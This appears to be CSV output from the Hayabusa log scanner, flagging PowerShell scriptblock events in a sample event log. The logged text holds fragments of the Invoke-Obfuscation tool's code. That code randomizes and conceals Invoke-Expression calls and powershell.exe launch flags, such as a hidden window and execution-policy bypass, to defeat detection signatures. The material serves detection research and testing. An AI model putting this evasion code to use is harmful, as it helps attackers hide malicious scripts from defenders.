@(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. 
$ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon 